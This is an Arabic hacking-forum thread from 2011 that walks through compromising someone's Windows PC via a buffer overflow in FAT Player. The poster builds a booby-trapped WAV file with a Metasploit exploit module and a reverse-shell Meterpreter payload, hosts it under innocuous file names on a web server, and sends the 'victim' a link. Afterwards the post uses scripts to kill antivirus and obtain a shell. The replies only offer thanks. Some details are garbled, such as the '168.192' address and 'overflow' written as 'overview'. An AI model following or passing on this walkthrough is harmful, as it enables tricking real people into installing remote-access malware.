:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   MetaSploit (http://www.vbspiders.com/vb/f196.html)
-   -   إختراق مستعمل الانترنت (fatplayer) (http://www.vbspiders.com/vb/t56681.html)

spid3rnet 07-15-2011 03:26 PM
إختراق مستعمل الانترنت (fatplayer)
 
هده طريقة لإختراق الحواسيب عن طريق ترغرة ال Buffer overviewالمتواجدة في ال
FAT player

لرؤية الشرح بالصورة و الصوت مباشرة هنا

http://blip.tv/jac0bn3t/metasploit-fatplayer-buffer-overview-5376533

للتحميل الشرح هنا

http://blip.tv/file/get/Jac0bn3t-met...verview350.mp4

كن سخيا و إ قرأ هدا الموضوع

ما قمت باستخدامه :

Metasploit

OS:backtrack 5 and Win SP3

Camtasia studio recorder and editor

Fat player

 الشرح:

قمت بإعداد PAYLOAD

على صيغة .WAV

exploit:windows/fileformat/fatplayer_wav
PAYLOAD :windows/meterpreter/reverse_tcp



كيف قمنا بصنع ال PAYLOAD

الشرح في الفيديو من الدقيقة 1:00 إلى 2:15

تم وضعناها أى ال PAYLOADفي /root/backdoor.wav

حملنا FATPLAYER 0.6bالمتغورة بال Buffer Overview

ووضعناها أيضا في ال /root/fatplayer_win32

بعد دالك قمنا بتغير أسماء

FAYplayer_win32=====>fatplayer.exe
backdoor.wav=======>playme.wav

حولناهم من / rootإلى /var/www

سوف تتسألون لمادا الى /var/www

لكي تصبح قابلة للتحميل من اي حاسوب

بعد فتح ال بورت 80 عن تطريق ال

service apache2 start

ارسلت للضحية رسالة فيها رابط
168.192.*.*/fatplayer.exe
و
168.192.*.*/playme.wav

بعد قراءة الضحية للرسالة و تحميل fatplayer.exe and playme.wav

و تشعيل الموسيقا سوف احصل على meterpreter

و سأبدأ ببعض Meterpreter scripting

run checkvm للمعرفة هل هو System وهمي

run killavللقتل عمل ال antivirus

تم shell-i للحصول على CMD or bash

الموسيقا :savage garder

animal song

santa monica

المجهووول 07-15-2011 11:57 PM
بارك الله فيك
شرح ومفيد واحترافي
يعطيك الف عافية
بالتوفيق
المجهوول

Black light 07-18-2011 12:36 AM
يعطيك العافيه ياغالي

hmada 09-07-2011 04:27 PM
رد: إختراق مستعمل الانترنت (fatplayer)
 
مشكووووووووور على الشرح


الساعة الآن 03:16 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0